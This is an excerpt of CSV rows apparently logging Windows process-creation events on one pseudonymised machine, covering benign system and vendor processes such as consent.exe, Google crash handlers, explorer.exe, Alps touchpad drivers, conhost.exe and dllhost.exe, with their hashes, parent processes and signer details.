+940,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:19.731671800+00:00,144,consent.exe,consent.exe 3388 452 000001C181D2E800,PortableExecutable,2021-02-17 04:35:10.855703500+00:00,C:\Windows\System32\consent.exe,166216,6646631ce4ad7128762352da81f3b030,56b2d516376328129132b815e22379ae8e7176825f059c9374a33cc844482e64,1095bd4b63360fc2968d75622aa745e5523428ab,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.157136200+00:00,3388,svchost.exe,svchost.exe -k netsvcs -p -s Appinfo,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.784020700+00:00,2021-06-23 00:52:50.782989700+00:00,b5fc634c-50d1-49d6-8db8-548de557ff31,computerpii_0a470890c60768167990033d701e7bd881398861,154457,False,10.7740.19041.1052,False,11540474045137067,,11540474045171767,2021-06-10 00:47:25.157136200+00:00,3388,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.530432200+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,consent,consent.exe,Consent UI for administrative applications
+941,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:19.860112600+00:00,19748,GoogleCrashHandler.exe,"""GoogleCrashHandler.exe""",PortableExecutable,2021-04-21 05:19:26.535730400+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleCrashHandler.exe,293720,36cb86775385de4d906cc13b712486fc,6d67fc790835b85e7b14def65958d9b30e0f6e6bc6d4ead40960a3ca993353ed,eb686b0067eb804c9120d25004c959f938d10f29,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:51:19.418653300+00:00,11036,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.958609500+00:00,2021-06-23 00:52:50.783132400+00:00,1ea9e2a6-4cef-49d8-a13c-43e7e81efb07,computerpii_0a470890c60768167990033d701e7bd881398861,154461,False,10.7740.19041.1052,False,11540474045171759,,11540474045171768,2021-06-23 00:51:19.418653300+00:00,11036,2021-06-23 00:51:19.418653300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,11036,18560,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-22 01:24:29.982603700+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.81,Google Update,GoogleUpdate.exe,Google Crash Handler
+942,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:19.865327700+00:00,9924,GoogleCrashHandler64.exe,"""GoogleCrashHandler64.exe""",PortableExecutable,2021-04-21 05:19:26.595569300+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleCrashHandler64.exe,374616,7bd9abfc8a31fd0ec1e674feb7ad2b5b,af0d678cf5d4bdd7a364e95460eb46e94f67a5037f4e4ad28580282c22f17812,1f466c4d5857a4d454780d87dea58d582ebed991,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:51:19.418653300+00:00,11036,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.961038700+00:00,2021-06-23 00:52:50.783166900+00:00,b88551d9-592a-4510-afa5-2385cfa9f933,computerpii_0a470890c60768167990033d701e7bd881398861,154462,False,10.7740.19041.1052,False,11540474045171759,,11540474045171769,2021-06-23 00:51:19.418653300+00:00,11036,2021-06-23 00:51:19.418653300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,11036,16512,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-22 01:24:29.982603700+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.81,Google Update,GoogleUpdate.exe,Google Crash Handler
+943,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,PortableExecutable,2021-06-09 01:20:37.358875500+00:00,C:\Windows\explorer.exe,4891752,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,582a919ca5f944aa83895a5c633c122c,eda7ee39d4db8142a1e0788e205e80ae798035d60273e74981e09e98c8d0e740,6d0c6aea6bce05166761085b1d612558f81d877a,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.663301200+00:00,18268,userinit.exe,userinit.exe,False,2021-06-22 11:17:36.425662+00:00,13120,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.017275100+00:00,2021-06-23 00:52:50.783239600+00:00,85ea1b6e-70dd-4cc8-b4d4-a5c0ebdcc94f,computerpii_0a470890c60768167990033d701e7bd881398861,154464,False,10.7740.19041.1052,False,11540474045171766,,11540474045171770,2021-06-23 00:51:19.663301200+00:00,18268,2021-06-23 00:51:19.663301200+00:00,\Device\HarddiskVolume3\Windows\System32\userinit.exe,18268,128,ActiveProcessStartkey,C:\Windows\System32,34816,2086-04-07 12:35:36+00:00,2019-12-07 09:08:49.164262100+00:00,2021-06-23 00:51:19.698719700+00:00,2019-12-07 09:08:49.164262100+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,2.0,1.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,userinit,USERINIT.EXE,Userinit Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer
+944,False,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.071461600+00:00,6384,ApMsgFwd.exe,"""ApMsgFwd.exe"" -s{05FA8492-C047-4207-BE65-780D8591C113}",PortableExecutable,2019-11-05 04:39:28+00:00,C:\Windows\System32\DellTPad\ApMsgFwd.exe,78224,a0d01803ba23a100c85167aeb4d71443,119a56501865f1ad1b28d4200d8ad416263ac62f804d44382b3de1391316f11d,2a55b50b96ad8e4d6f3e591f95cfa9cd212e8c5c,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.136815600+00:00,12088,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.201155100+00:00,2021-06-23 00:52:50.784021900+00:00,2a174f93-1dc1-46f1-a854-cf564ac606d3,computerpii_0a470890c60768167990033d701e7bd881398861,154472,False,10.7740.19041.1052,False,11540474045171751,,11540474045171771,2021-06-23 00:51:19.136815600+00:00,12088,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,Missing,c:\windows\system32\delltpad\apoint.exe,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:19.137196100+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",ApMsgFwd,"8, 1, 0, 157",ApMsgFwd,ApMsgFwd.exe,ApMsgFwd
+945,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.143303300+00:00,18808,ApntEx.exe,"""Apntex.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\ApntEx.exe,35216,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.136815600+00:00,12088,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.257459500+00:00,2021-06-23 00:52:50.784125400+00:00,fe5174fb-dd78-4ae3-ae22-47f9714bc86c,computerpii_0a470890c60768167990033d701e7bd881398861,154475,False,10.7740.19041.1052,False,11540474045171751,,11540474045171772,2021-06-23 00:51:19.136815600+00:00,12088,2021-06-23 00:51:19.136815600+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,12088,18560,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:19.137196100+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows
+946,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.157228300+00:00,11520,ApRemote.exe,"""ApRemote.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\ApRemote.exe,134544,4c56cd1ebd7c91723353ae6fb4156f7f,dd1337f8edb0521c8928fc208046abda8815b29e5880aaef9ce12d1ae8588abe,36bacb69397345b85cf4e0770656eea05ab5461e,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.136815600+00:00,12088,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.286455200+00:00,2021-06-23 00:52:50.784162700+00:00,e2930ae6-02d4-44fb-b708-1695fb48f98d,computerpii_0a470890c60768167990033d701e7bd881398861,154476,False,10.7740.19041.1052,False,11540474045171751,,11540474045171773,2021-06-23 00:51:19.136815600+00:00,12088,2021-06-23 00:51:19.136815600+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,12088,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:19.137196100+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.101.6,ApRemote.exe,ApRemote.exe,ApRemote
+947,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.167862700+00:00,8212,hidfind.exe,"""HidFind.exe""",PortableExecutable,2019-11-05 04:39:34+00:00,C:\Windows\System32\DellTPad\hidfind.exe,80784,96ef2112ad18bcf50257c3e0b336681d,1a01512a4a8ebb9b3b790f3d29efbad5016ff9fe2c6a359e75ed7d4869afba18,7765d712623ddddce8d57ff3a3a011ddd9713ca5,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.136815600+00:00,12088,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.303612600+00:00,2021-06-23 00:52:50.784197900+00:00,e7982cdb-8da5-4f58-aead-c716f5fd3164,computerpii_0a470890c60768167990033d701e7bd881398861,154477,False,10.7740.19041.1052,False,11540474045171751,,11540474045171774,2021-06-23 00:51:19.136815600+00:00,12088,2021-06-23 00:51:19.136815600+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,12088,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:19.137196100+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,"8, 1, 0, 139",Alps Pointing-device Driver,hidfind.exe,Alps Pointing-device Driver
+948,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.329137900+00:00,3836,ApntEx.exe,"""Apntex.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\ApntEx.exe,35216,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:20.143303300+00:00,18808,ApntEx.exe,"""Apntex.exe""",False,2021-06-23 00:51:19.136815600+00:00,12088,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.396351600+00:00,2021-06-23 00:52:50.784695+00:00,988df38c-8bbc-4726-9ef4-c12afc74a97a,computerpii_0a470890c60768167990033d701e7bd881398861,154491,False,10.7740.19041.1052,False,11540474045171772,,11540474045171775,2021-06-23 00:51:20.143303300+00:00,18808,2021-06-23 00:51:20.143303300+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\ApntEx.exe,18808,128,TerminateProcessStartkey,C:\Windows\System32\DellTPad,35216,2019-06-10 06:58:14+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:20.150125100+00:00,2019-11-05 04:39:30+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows
+949,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.484942500+00:00,1836,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:20.329137900+00:00,3836,ApntEx.exe,"""Apntex.exe""",False,2021-06-23 00:51:20.143303300+00:00,18808,\Device\HarddiskVolume3\Windows\System32\DellTPad\ApntEx.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.530242100+00:00,2021-06-23 00:52:50.784871400+00:00,04c0d004-8d8c-4329-a1ae-8dee9b69c60f,computerpii_0a470890c60768167990033d701e7bd881398861,154496,False,10.7740.19041.1052,False,11540474045171775,,11540474045171779,2021-06-23 00:51:20.329137900+00:00,3836,2021-06-23 00:51:20.329137900+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\ApntEx.exe,3836,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,35216,2019-06-10 06:58:14+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:20.150125100+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+950,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:20.876150300+00:00,1632,dllhost.exe,DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:20.983013500+00:00,2021-06-23 00:52:50.785596+00:00,5f5fac02-556d-4e0f-a6a7-42bf2298dd0c,computerpii_0a470890c60768167990033d701e7bd881398861,154517,False,10.7740.19041.1052,False,11540474045136908,,11540474045171780,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
